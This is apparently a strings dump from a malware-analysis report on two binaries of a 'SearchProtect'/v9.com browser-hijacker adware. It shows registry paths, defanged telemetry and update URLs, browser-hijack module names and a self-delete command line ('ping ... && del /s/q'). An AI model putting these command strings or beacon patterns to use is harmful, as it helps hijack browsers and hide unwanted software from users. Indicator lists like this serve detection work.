- floating point support not loaded
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
WindowsMangerProtect
WindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
xa.geoip
xa.geoip
visit.heartbeat
visit.heartbeat
ProtectWindowsManager.exe
ProtectWindowsManager.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
TypesSupported
TypesSupported
%s is already installed
%s is already installed
%s installed
%s installed
%s failed to install. Error %d
%s failed to install. Error %d
%s is not installed
%s is not installed
Could not remove %s. Error %d
Could not remove %s. Error %d
WindowsProtectManger
WindowsProtectManger
Advapi32.dll
Advapi32.dll
/c ping 127.0.0.1 -n 2 > nul && del
/c ping 127.0.0.1 -n 2 > nul && del
"%s" %s
"%s" %s
psapi.dll
psapi.dll
Explorer.exe
Explorer.exe
urlmon.dll
urlmon.dll
update.exe
update.exe
Assertion failed: %s, file %s, line %d
Assertion failed: %s, file %s, line %d
WindowsMangerProtect Service
WindowsMangerProtect Service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
WindowsMangerProtect service
WindowsMangerProtect service
SysTool PasSame LIMITED
SysTool PasSame LIMITED
Windows SysTool Svr
Windows SysTool Svr
20.0.0.2227
20.0.0.2227
Windows SysTool.exe
Windows SysTool.exe
HPNotify.exe_3640:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
wszUrl
wszUrl
strUrlTemp
strUrlTemp
hKEY
hKEY
strSelUrl
strSelUrl
strUrl
strUrl
strConfUrlTemp
strConfUrlTemp
strDsUrl
strDsUrl
strHpUrl
strHpUrl
strCmdLine
strCmdLine
tCPW
tCPW
%UUUU
%UUUU
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileW ret:0XX
URLDownloadToFileW ret:0XX
Error : %d
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
1.1.3
monochrome
monochrome
unsupported bit depth
unsupported bit depth
`'\%D,3
`'\%D,3
Run-Time Check Failure #%d - %s
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%p%s%ld%s%d%s
%s%s%s%s
%s%s%s%s
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
del /s/q %1\*.*
del /s/q %1\*.*
%suninstall.bat
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteA
ShellExecuteA
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
MSVCP110.dll
MSVCP110.dll
MSVCR110.dll
MSVCR110.dll
_calloc_crt
_calloc_crt
_CRT_RTC_INITW
_CRT_RTC_INITW
__crtGetShowWindowMode
__crtGetShowWindowMode
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
__crtUnhandledException
__crtUnhandledException
__crtTerminateProcess
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
__crtSetUnhandledExceptionFilter
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
WININET.dll
WININET.dll
COMCTL32.dll
COMCTL32.dll
GetProcessHeap
GetProcessHeap
#*1892 $
#*1892 $
%,3:;4-&
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
3?3
3?3
1-2}2
1-2}2
77t7
77t7
9":,:6:@:
9":,:6:@:
12u2
12u2
9 9$9(9,9094989
9 9$9(9,9094989
0 1@1\1|1
0 1@1\1|1
hXXp://VVV.bing.com/
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
hXXp://VVV.google.com/
%sconf
%sconf
web/?type=dspp&
web/?type=dspp&
web/?type=dspp
web/?type=dspp
hXXp://VVV.v9.com/
hXXp://VVV.v9.com/
Itemd
Itemd
BrowserAction.dll
BrowserAction.dll
%u_%u
%u_%u
%s_%s
%s_%s
%s_X
%s_X
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
UrlEdit
UrlEdit
conf.xml
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
%stmp%d.tmp
urlmon.dll
urlmon.dll
main.xml
main.xml
explorer.exe
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
msimg32.dll
msimg32.dll
User32.dll
User32.dll
WM_KEYDOWN
WM_KEYDOWN
WM_KEYUP
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYDOWN
WM_SYSKEYUP
WM_SYSKEYUP
0xX
0xX
keyboard
keyboard
msftedit.dll
msftedit.dll
password
password
%s%s%s
%s%s%s
Correct password required
Correct password required
%s\%s
%s\%s
WebBrowser
WebBrowser
transshadow
transshadow
transshadow1
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
M-d-d
WebBrowserUI
WebBrowserUI
errorUrl
errorUrl
{D27CDB6E-AE6D-11CF-96B8-444553540000}
{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
user32.dll
MSPDB110.DLL
MSPDB110.DLL
ADVAPI32.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
%Program Files% (x86)\XTab\skin\
%Program Files% (x86)\XTab\skin\
SupHPNot.exe
SupHPNot.exe
4,0,1,2253
4,0,1,2253
SupHPNty.exe
SupHPNty.exe
ProtectService.exe_3668:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
GET %s%s%s HTTP/1.1
GET %s%s%s HTTP/1.1
Host: %s
Host: %s
%sUser-Agent: Mozilla/4.0
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
POST %s HTTP/1.1
%sContent-Type: %s
%sContent-Type: %s
User-Agent: Mozilla/4.0
User-Agent: Mozilla/4.0
Content-Length: %u
Content-Length: %u
%*s %d %*s
%*s %d %*s
%*[ ]%[^
%*[ ]%[^
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
file_url
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetProcessHeap
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyW
RegOpenKeyW
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MSVCP110.dll
MSVCP110.dll
InternetCrackUrlW
InternetCrackUrlW
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHLWAPI.dll
SHLWAPI.dll
MSVCR110.dll
MSVCR110.dll
_crt_debugger_hook
_crt_debugger_hook
__crtUnhandledException
__crtUnhandledException
__crtTerminateProcess
__crtTerminateProcess
_calloc_crt
_calloc_crt
__crtGetShowWindowMode
__crtGetShowWindowMode
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
__crtSetUnhandledExceptionFilter
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpOpen
WinHttpOpen
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetOption
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpWriteData
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WINHTTP.dll
WINHTTP.dll
SensApi.dll
SensApi.dll
VERSION.dll
VERSION.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
.?AVCHttpClient@@
.?AVCHttpClient@@
.?AVCTcpipSocket@@
.?AVCTcpipSocket@@
2-2v2
2-2v2
hXXp://
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
http=
WinHttpClient
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
hXXp://xa.xingcloud.com
xxxx
xxxx
%u_%u
%u_%u
%s_%s
%s_%s
%s_X
%s_X
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
UpDateProcess.exe
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
Report HeartBeat
cmdshell.exe
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
explorer.exe
Advapi32.dll
Advapi32.dll
"%s" %s
"%s" %s
psapi.dll
psapi.dll
Explorer.exe
Explorer.exe
json_value.cpp
json_value.cpp
ljson_reader.cpp
ljson_reader.cpp
ProtectSvc.exe
ProtectSvc.exe
4.0.1.2253
4.0.1.2253